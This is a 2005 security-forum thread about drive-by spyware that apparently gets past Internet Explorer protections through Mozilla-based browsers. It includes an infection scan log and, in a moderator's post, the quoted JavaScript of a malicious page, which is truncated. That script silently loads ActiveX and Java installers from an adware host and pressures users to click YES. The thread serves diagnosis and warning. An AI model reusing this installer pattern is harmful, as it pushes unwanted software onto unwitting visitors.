116 replies to this topic

[Coyote]

If you want to point someone at this post:
http://TomCoyote.org/Theory/
that link will bring you to here

My appologies if anyone takes anything said against thier browser, their surfing, their computer, their dogs or their cats, this is just a conversation that needs to be thought about


[ 09:39:25 ]  [ @Efwis ] I had fun teh other night, was surfing the web for a neildiamond song, got nailed with a major hijacking
[ 09:39:33 ]  [ @Efwis ] *Neil Diamond
[ 09:39:43 ]  [ @Coyote` ] neil will do that to you
[ 09:39:54 ]  [ @Coyote` ] go with Pink Floyd next time
[ 09:40:45 ]  [ @Efwis ] heh, hit me with 180solutions, l2m, 10 viruses 2 trojan downloaders, a java exploit, and a hompage hijack, went right around Moz and nailed IE
[ 09:40:46 ]  [ @Coyote` ] it's a crying shame that no one is safe looking for things nowadays
[ 09:41:12 ]  [ @Efwis ] oh I forgot ISTVbar and sidesearch
[ 09:41:41 ]  [ @Coyote` ] let's say you have IE secure, and you use another browser
[ 09:42:31 ]  [ @Coyote` ] this other browser allows something to happen that bypasses the first block you have built into IE say Iespyads, thus IE is now a target again through this other browser
[ 09:42:44 ]  [ @Coyote` ] this IS just a theory btw
[ 09:42:51 ]  [ @Coyote` ] but it is possible
[ 09:43:31 ]  [ @Coyote` ] now if you go to that same site in IE, nothing happens because your first block stopped it
[ 09:43:45 ]  [ @Efwis ] i'm looked in my IE_Spyad files, this page isn't even listed, although it should be, I think i will contact Eric Howes adn he can add it to his next update
[ 09:44:11 ]  [ @Coyote` ] are you in the classroom?
[ 09:44:18 ]  [ @Efwis ] yeah, your theory has merit adn is probably quite accurate
[ 09:44:22 ]  [ @Efwis ] yes I am
[ 09:44:32 ]  [ @Coyote` ] have you been keeping up with wng_z3r0's problem that I have posted to?
[ 09:44:45 ]  [ @Efwis ] no, got a link?
[ 09:44:53 ]  [ @Coyote` ] http://forums.tomcoy...ndpost&p=137765
[ 09:45:08 ]  [ @Coyote` ] took 4 pages of posts to finally get to the root of the problem
[ 09:45:26 ]  [ @Efwis ] looking
[ 09:45:41 ]  [ @Coyote` ] his shell browser covering IE allowed something IE wouldn't
[ 09:46:31 ]  [ @Coyote` ] not so much a theory anymore
[ 09:48:00 ]  [ @bozodog ] are you saying that Mozilla can let stuff through to IE and beyond?
[ 09:48:50 ]  [ @Coyote` ] I am not saying anything about moz, I am saying it is a possibility that an alternate browser can let things bypass to IE and therefore cause problems
[ 09:49:44 ]  [ @Coyote` ] and by them bypassing to IE, IE's protections can be bypassed that normally wouldn't if IE was in use instead of the alternate
[ 09:50:29 ]  [ @bozodog ] err.. I think I understand
[ 09:51:01 ]  [ @Coyote` ] it's like a layer effect, you have layers of protections you set in place, using an alternate browser, you can possibly bypass a layer
or two which in turn can lead to your being infected
[ 09:51:36 ]  [ @Coyote` ] it may not go in the front door but it might find a side window
[ 09:51:37 ]  [ @bozodog ] Ahh..
[ 09:52:45 ]  [ @Coyote` ] I won't say that it is possible with any particular browser, I think in fact it may be possible with any browser
[ 09:53:03 ]  [ @Coyote` ] but this is only theory at this point
[ 09:53:24 ]  [ @Coyote` ] some script kiddie will strive to make it happen on a regular basis eventually
[ 09:54:10 ]  [ @bozodog ] sounds like a solid thought... they are getting better at mucking up our systems..
[ 09:54:36 ]  [ @Coyote` ] well, the problem itself goes back to windows,
[ 09:54:53 ]  [ @Coyote` ] windows is made to accomodate users of limited knowledge
[ 09:55:06 ]  [ @bozodog ] but doesn't your AV, etc... do it's job in that case?
[ 09:55:09 ]  [ @Coyote` ] so that in itself is preyed upon by the kiddies
[ 09:55:36 ]  [ @Coyote` ] AV is only one part of an overall solution and it lacks a great deal of the overall protection
[ 09:56:07 ]  [ @Coyote` ] the AV chosen also plays a part in how that is defined
[ 09:56:42 ]  [ @Coyote` ] several AV's have weak real time scanning engines that fail at the sight of any infection
[ 09:57:15 ]  [ @Coyote` ] real time scanning engines are the only way to truly combat virus and trojans
[ 09:57:28 ]  [ @bozodog ] I only use Avast free... and spywareblaster etc..
[ 09:57:42 ]  [ @Coyote` ] I have not tried Avast
[ 09:57:51 ]  [ @Coyote` ] so I cannot comment on it
[ 09:58:27 ]  [ @bozodog ] it sure updates often, (2-3 times a day at times)
[ 09:58:51 ]  [ @Coyote` ] I hope that is because they are adding to the database and not correcting mistakes
[ 09:58:58 ]  [ @bozodog ] and scares the heck outa me when some baddie trys to get in
[ 09:59:15 ]  [ @bozodog ] yeah, it's data
[ 09:59:34 ]  [ @Coyote` ] well, you can't tell from the updating
[ 09:59:53 ]  [ @Coyote` ] you would have to disect each dataflow
[ 10:00:03 ]  [ @Coyote` ] and know what coding they use
[ 10:00:51 ]  [ @Efwis ] from looking at that post, i wouold say you are correct Tom, no longer a theory but a proven fact
[ 10:01:15 ]  [ @bozodog ] of course I don't surf the back alleys, or p2p stuff
[ 10:01:24 ]  [ @Coyote` ] well, fact for his situation, theory for other browsers at this point
[ 10:01:52 ]  [ @Coyote` ] bozodog look at what happened to Efwis looking for a neil diamond song
[ 10:01:59 ]  [ @Efwis ] based on what happened to me its a fact for Moz too
[ 10:02:01 ]  [ @bozodog ] yep
[ 10:02:30 ]  [ @bozodog ] do you use Moz of FF?
[ 10:02:31 ]  [ @Coyote` ] I hate it when I am correct about some of these theories but I am right too many times
[ 10:02:48 ]  [ @Efwis ] i went there with my IE yesterday, nothing happened, all my protections worked correctly
[ 10:03:13 ]  [ @bozodog ] you're like a hound dog.. you can sniff out problems
[ 10:03:13 ]  [ @Efwis ] so I am inclined to believe it is something actually programmed into the html code
[ 10:03:40 ]  [ @Efwis ] he is good at what he does, and I like his info, because he usually is correct bd
[ 10:04:23 ]  [ @bozodog ] don't I know it... he knows I have the highest respect for what he says

[Efwis]

The below log was genrated from a machine that went to the website where I got nailed at. Prior to going to the website this computer was 100% clean. once again this went around a mozilla based browser, specifically Firefox. Logfile of HijackThis v1.99.1 Scan saved at 6:39:10 PM, on 3/4/2005 Platform: Windows XP SP1 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\csrss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe C:\WINDOWS\System32\alg.exe C:\Program Files\VMware\VMware Tools\VMwareService.exe C:\WINDOWS\System32\wuauclt.exe C:\WINDOWS\System32\wpabaln.exe C:\WINDOWS\explorer.exe C:\Program Files\ISTsvc\istsvc.exe C:\WINDOWS\efkvjaxe.exe C:\WINDOWS\System32\pifrop.exe C:\WINDOWS\System32\pridmd.exe C:\Program Files\AutoUpdate\AutoUpdate.exe C:\Program Files\Web_Rebates\WebRebates1.exe c:\program files\180solutions\sais.exe C:\Program Files\Web_Rebates\WebRebates0.exe C:\Program Files\CxtPls\CxtPls.exe C:\HijackThis\HijackThis.exe O2 - BHO: (no name) - {016235BE-59D4-4CEB-ADD5-E2378282A1D9} - C:\Program Files\CxtPls\cxtpls.dll O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O2 - BHO: (no name) - {8AB8080E-1276-4F6C-9340-F7ABF14760E8} - C:\Documents and Settings\edited\My Documents\Spyware\AdGoblin_kbmdlt\kbmdlt.dll (file missing) O2 - BHO: BAHelper Class - {A3FDD654-A057-4971-9844-4ED8E67DBBB8} - C:\Program Files\SideFind\sfbho.dll O2 - BHO: (no name) - {F7D4D9DA-41FD-4B3A-82E8-6BE117DBF3FC} - C:\Documents and Settings\edited\My Documents\Spyware\AdGoblin\AdGoblin\jsgdw400.dll (file missing) O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx O3 - Toolbar: YourSiteBar - {86227D9C-0EFE-4f8a-AA55-30386A3F5686} - C:\PROGRA~1\YOURSI~1\ysb.dll O4 - HKLM\..\Run: [VMware Tools] C:\Program Files\VMware\VMware Tools\VMwareTray.exe O4 - HKLM\..\Run: [VMware User Process] C:\Program Files\VMware\VMware Tools\VMwareUser.exe O4 - HKLM\..\Run: [IST Service] C:\Program Files\ISTsvc\istsvc.exe O4 - HKLM\..\Run: [amvV9A] C:\WINDOWS\efkvjaxe.exe O4 - HKLM\..\Run: [sais] c:\program files\180solutions\sais.exe O4 - HKLM\..\Run: [AutoLoaderAproposClient] "C:\DOCUME~1\Jeff\LOCALS~1\Temp\cxtpls_loader.exe" /PC=CP.IST /ForSupportedBrowsers /ShowLegalNote=nonbranded O4 - HKLM\..\Run: [q37P3sP] pridmd.exe O4 - HKLM\..\Run: [AutoUpdater] "C:\Program Files\AutoUpdate\AutoUpdate.exe" O4 - HKLM\..\Run: [ilshiz] C:\WINDOWS\ilshiz.exe O4 - HKLM\..\Run: [Power Scan] C:\Program Files\Power Scan\powerscan.exe O4 - HKLM\..\Run: [WebRebates0] C:\Program Files\Web_Rebates\WebRebates0.exe O4 - HKLM\..\RunOnce: [djtopr1150.exe] "C:\DOCUME~1\Jeff\LOCALS~1\Temp\djtopr1150.exe" O4 - HKCU\..\Run: [SpySweeper] "C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe" /0 O4 - HKCU\..\Run: [b0oFRijnT] pifrop.exe O4 - Startup: zlv8eyi9.lnk = C:\WINDOWS\zlv8eyi9.exe O4 - Global Startup: zlv8eyi9.lnk = C:\WINDOWS\zlv8eyi9.exe O9 - Extra button: SideFind - {10E42047-DEB9-4535-A118-B3F6EC39B807} - C:\Program Files\SideFind\sidefind.dll O16 - DPF: {42F2C9BA-614F-47C0-B3E3-ECFD34EED658} (Installer Class) - hxxp://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab O23 - Service: VMware Tools Service (VMTools) - VMware, Inc. - C:\Program Files\VMware\VMware Tools\VMwareService.exe

[shelf life]

Efwis, can you post a link to the website

[wng_z3r0]

if such a theory were true, is there a way to "really" uninstall iexplorer?

[Coyote]

this go over your head? the problem is not IE, if you have IE protected and then use an alternate browser that bypasses IE's protection, that is the problem. IE is integrated deep into the system, you can't get rid of it.

[Efwis]

Efwis, can you post a link to the website

That is something that I would rather not post for the safety of our members. However, I can tell you that the website is real since the above log is not mine, but a fellow malware hunter's log from going to the same site I did.

[ChrisRLG]

Efwis Has Jeff got his computer clean now - (Its in the path statements). Tip :- When posting make sure they are edited out.

[wng_z3r0]

IE is integrated deep into the system, you can't get rid of it.

that's my point

If we can't really get rid of it, then how much use are other browsers? SUre they offer better protection than ie, but if malware can USE the other browser to bypass ie's security, then what is the point?

[Besttechie]

Hey Everyone, As you can see from the log Efwis posted (which is my log) I infected my PC. The infections aren't that tough to remove, you can easily remove the infections with Spybot Search & Destroy along with HJT after. I took my time in looking into the files and analyzing them. It's basic infections such as, IST, PowerScan, SideFind, Webrebates, and a few others. Now, here is an interesting piece of information. I decided to reinfect myself again (using the same link) but the second time I reinfected myself, there were a few new pieces of spyware installed. Mostly the same as before, but also added a few new things. Thought that was interesting. This might be something to look out for using Firefox to infect IE. ChrisRLG: Yes, I have cleaned out the infection. If you have any more questions for me, feel free to post them. I'll do my best to answer. B

[insipid]

Now, here is an interesting piece of information.  I decided to reinfect myself again (using the same link) but the second time I reinfected myself, there were a few new pieces of spyware installed.  Mostly the same as before, but also added a few new things.  Thought that was interesting.  This might be something to look out for using Firefox to infect IE. 

This is my concern. If this is truly happening, it will spread like the plague (recall how fast Vx2 burst out). The above infection won't be tough to remove, and it would be easy enough to block one site with a Hosts file, but what is it going to evolve into?

Which begs the real questions: How to prevent this? Recommend switching back to IE? Shall I give up my tabbed browsing?

Gah, the hits just keep on coming, don't they?

[Coyote]

It is always your choice as to what to use, I have always said though that if you don't protect IE then you are in for a surprise, now though even with protecting IE you could have a problem, so it is not that simple anymore given the above situation, should you switch back to IE and give up what you want? That you will have to answer for yourself, it is your computer.

[Coyote]

This is a js file that was called to from the link in question that infected Efwis

DO NOT CLICK ON ANY LINKS IN THE CODE BELOW!!!

var flag=0;
 var loadfirst=0;
 var sp2=false;
 if(window.navigator.userAgent.indexOf("SV1") != -1) sp2=true;
 if (sp2){
   document.write('<div id="tutorial_popup" style="visibility:hidden;position:absolute;top:0px;left:0px;width:635px;height:308px;"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="635" height="308">');
   document.write('<param name="movie" value="http://www.slotchbar.com/ist/flash/sp2tutorial_v1.swf">param name="quality" value="high"><param name="wmode" value="transparent">');
   document.write('<embed src="http://www.ysbweb.com/ist/flash/sp2tutorial_v1.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="700" height="500"></embed></object></div>');
 document.write('<iframe id="downloads_manager" style="position:absolute; visibility:hidden;"></iframe>');
 function retryit(){	
	if(window.retry && retry>0) {
  	alert("You must click YES to have access");
  	loadfirst=0;
  	start_download();
  	retry--;
 function showActiveX() {
        holder.write('<OBJECT id="barobject" width=1 height=1 classid="CLSID:42F2C9BA-614F-47c0-B3E3-ECFD34EED658"');
        holder.write('codebase="http://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab" onerror="parent.retryit();">');
        holder.write('<PARAM name="account_id" value="1001958">');
        holder.write('<PARAM name="download_key" value="7691d7d23d9583dd2f6752e154d4602f">');
        holder.write('<PARAM name="download_lock" value="1110072926">');
        holder.write('<PARAM name="cfg" value="ysb_l3">');
        holder.write('<PARAM name="sub" value="">');
        holder.write('</OBJECT>');
 function showJava() {
          holder.write('<APPLET Archive="http://www.ysbweb.com/ist/softwares/v4.0/javainstaller.jar" code="javainstaller.InstallerApplet.class" name="InstallerApplet" width="0" height="0" hspace="0" vspace="0" align="middle">');
          holder.write('<PARAM name="account_id" value="1001958">');
          holder.write('<PARAM name="download_key" value="7691d7d23d9583dd2f6752e154d4602f">');
          holder.write('<PARAM name="download_lock" value="1110072926">');
          holder.write('<PARAM name="cfg" value="ysb_l3">');
          holder.write('<PARAM name="sub" value="">');
          holder.write('</APPLET>');
 function showNS() {
          holder.write('<APPLET Archive="http://www.ysbweb.com/ist/softwares/v4.0/javainstaller.jar" code="javainstaller.InstallerApplet.class" name="InstallerApplet" width="0" height="0" hspace="0" vspace="0" align="middle">');
          holder.write('<PARAM name="account_id" value="1001958">');
          holder.write('<PARAM name="download_key" value="7691d7d23d9583dd2f6752e154d4602f">');
          holder.write('<PARAM name="download_lock" value="1110072926">');
          holder.write('<PARAM name="cfg" value="ysb_l3">');
          holder.write('<PARAM name="sub" value="">');
          holder.write('</APPLET>');
 function start_download() {
        var bname=navigator.appName;
        var bver=parseInt(navigator.appVersion);
        if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
                if(!loadfirst || sp2){
                        downloads_manager.document.close();
                        holder= downloads_manager.document;
                        holder=document;
                showActiveX();
                if (sp2) document.all.tutorial_popup.style.visibility = "visible";
                if(!flag && !sp2){
                        window.open("

[helpless]

I can say at work using other browsers then MSIE is not allowed , for example Mozilla Firefox will always bypass the blocking we have on some websites. I have seen it , done it and reported it. Its more then logic that each browser needs his own different protection (if needed), because they are nested differently into your OS.

Edited by helpless, 06 March 2005 - 05:43 AM.

[Efwis]

Efwis,
Do you happen to know which version of Firefox was being used?
Rick

when it came to my infection it was through plain Mozilla version 1.7. Windows SP2 is installed on my machine also.

the log provided by Besttechie in this post was through IE.

Edited by Efwis, 06 March 2005 - 08:07 AM.